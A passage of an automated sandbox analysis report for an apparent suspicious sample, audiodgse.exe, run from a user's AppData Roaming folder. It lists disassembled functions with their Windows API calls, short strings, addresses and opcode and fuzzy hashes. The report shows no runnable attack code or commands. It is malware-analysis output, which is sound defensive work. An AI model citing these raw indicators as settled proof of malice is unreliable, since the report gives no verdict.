Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404A6D Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A84
GetDlgItem.USER32(?,00000408), ref: 00404A91
GlobalAlloc.KERNEL32(00000040,?), ref: 00404AE0
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
SetWindowLongA.USER32(?,000000FC,00405075), ref: 00404B11
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B23
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
SendMessageA.USER32 ref: 00404B4D
SendMessageA.USER32 ref: 00404B59
SendMessageA.USER32 ref: 00404B69
DeleteObject.GDI32(00000110), ref: 00404B6E
SendMessageA.USER32 ref: 00404B99
SendMessageA.USER32 ref: 00404BA5
SendMessageA.USER32 ref: 00404C3F
SendMessageA.USER32 ref: 00404C6F

Part of subcall function 0040409D: SendMessageA.USER32 ref: 004040AB

SendMessageA.USER32 ref: 00404C83
GetWindowLongA.USER32(?,000000F0), ref: 00404CB1
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CBF
ShowWindow.USER32(?,00000005), ref: 00404CCF
SendMessageA.USER32 ref: 00404DCA
SendMessageA.USER32 ref: 00404E2F
SendMessageA.USER32 ref: 00404E44
SendMessageA.USER32 ref: 00404E68
SendMessageA.USER32 ref: 00404E88
ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
GlobalFree.KERNEL32(00000000), ref: 00404EAD
SendMessageA.USER32 ref: 00404F26
SendMessageA.USER32 ref: 00404FCF
SendMessageA.USER32 ref: 00404FDE
InvalidateRect.USER32(?,00000000,00000001), ref: 00404FFE
ShowWindow.USER32(?,00000000), ref: 0040504C
GetDlgItem.USER32(?,000003FE), ref: 00405057
ShowWindow.USER32(00000000), ref: 0040505E

Strings

, xrefs: 00405036
M, xrefs: 00404C27
jl-, xrefs: 00405004
N, xrefs: 00404D08

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$jl-
API String ID: 2564846305-2707505489
Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004041D3 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040425E
GetDlgItem.USER32(00000000,000003E8), ref: 00404272
SendMessageA.USER32 ref: 00404290
GetSysColor.USER32 ref: 004042A1
SendMessageA.USER32 ref: 004042B0
SendMessageA.USER32 ref: 004042BF
lstrlenA.KERNEL32(?), ref: 004042C2
SendMessageA.USER32 ref: 004042D1
SendMessageA.USER32 ref: 004042E6
GetDlgItem.USER32(?,0000040A), ref: 00404348
SendMessageA.USER32 ref: 0040434B
GetDlgItem.USER32(?,000003E8), ref: 00404376
SendMessageA.USER32 ref: 004043B6
LoadCursorA.USER32 ref: 004043C5
SetCursor.USER32(00000000), ref: 004043CE
LoadCursorA.USER32 ref: 004043E4
SetCursor.USER32(00000000), ref: 004043E7
SendMessageA.USER32 ref: 00404413
SendMessageA.USER32 ref: 00404427

Strings

N, xrefs: 00404364
Call, xrefs: 004043A1
jl-, xrefs: 004041F3

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$jl-
API String ID: 3103080414-2335472926
Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405C49 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 00405C7A
GetShortPathNameA.KERNEL32 ref: 00405C83

Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A

GetShortPathNameA.KERNEL32 ref: 00405CA0
wsprintfA.USER32 ref: 00405CBE
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405CF9
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D08
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
GlobalFree.KERNEL32(00000000), ref: 00405DA7
CloseHandle.KERNEL32(00000000), ref: 00405DAE

Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99

Strings

%s=%s, xrefs: 00405CB4
[Rename], xrefs: 00405D28, 00405D3A

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00406244 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 0040629C
CharNextA.USER32(?), ref: 004062A9
CharNextA.USER32(?), ref: 004062AE
CharPrevA.USER32(?,?), ref: 004062BE

Strings

"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00406280
C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
*?|<>/":, xrefs: 0040628C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3491598343
Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E

Uniqueness

Uniqueness Score: -1.00%

Function 004040CF Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040EC
GetSysColor.USER32 ref: 0040412A
SetTextColor.GDI32(?,00000000), ref: 00404136
SetBkMode.GDI32(?,?), ref: 00404142
GetSysColor.USER32 ref: 00404155
SetBkColor.GDI32(?,?), ref: 00404165
DeleteObject.GDI32(?), ref: 0040417F
CreateBrushIndirect.GDI32(?), ref: 00404189

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55

Uniqueness

Uniqueness Score: -1.00%

Function 72BE24D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 72BE1215: GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D

GlobalFree.KERNEL32(?), ref: 72BE25DE
GlobalFree.KERNEL32(00000000), ref: 72BE2618

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 89c5f2622ed8e45f7c8feb53599205adad0d961d3e9e9822aa19461855ac5ead
Instruction ID: 837cee6d95261a52782dfe6fa1566e51d3e6ea238b0f77762d7ee2db03daf114
Opcode Fuzzy Hash: 89c5f2622ed8e45f7c8feb53599205adad0d961d3e9e9822aa19461855ac5ead
Instruction Fuzzy Hash: 9941CEB2D44200EFD3268F68CDA4E2A7BFAEB85744F20496DF54387242DB359D08DB61

Uniqueness

Uniqueness Score: -1.00%

Function 004049BB Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 004049D6
GetMessagePos.USER32 ref: 004049DE
ScreenToClient.USER32(?,?), ref: 004049F8
SendMessageA.USER32 ref: 00404A0A
SendMessageA.USER32 ref: 00404A30

Strings

f, xrefs: 00404A0C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401DFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32 ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84

Strings

Calibri, xrefs: 00401E6A

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F

Uniqueness

Uniqueness Score: -1.00%

Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
MulDiv.KERNEL32 ref: 00402D23
wsprintfA.USER32 ref: 00402D33
SetWindowTextA.USER32(?,?), ref: 00402D43
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55

Strings

verifying installer: %d%%, xrefs: 00402D2D

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59

Uniqueness

Uniqueness Score: -1.00%

Function 72BE22F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 72BE2447

Part of subcall function 72BE1224: lstrcpynA.KERNEL32(00000000,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE1234

GlobalAlloc.KERNEL32(00000040,?), ref: 72BE23C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72BE23D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 72BE23E8
CLSIDFromString.OLE32(00000000,00000000), ref: 72BE23F6
GlobalFree.KERNEL32(00000000), ref: 72BE23FD

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 49282b882e2ea9f62fb21a1d645cf2fe9f82cc029c60b69ae59be2fde378b40e
Instruction ID: d9ef99830ee571940d1e7909ff3739992b45ca8e9773557c1967f61425dc3b14
Opcode Fuzzy Hash: 49282b882e2ea9f62fb21a1d645cf2fe9f82cc029c60b69ae59be2fde378b40e
Instruction Fuzzy Hash: 2A4156B2D08301EFE7218F299844B2ABBF8FF44311F24896EE58796591E7309954CF62

Uniqueness

Uniqueness Score: -1.00%

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
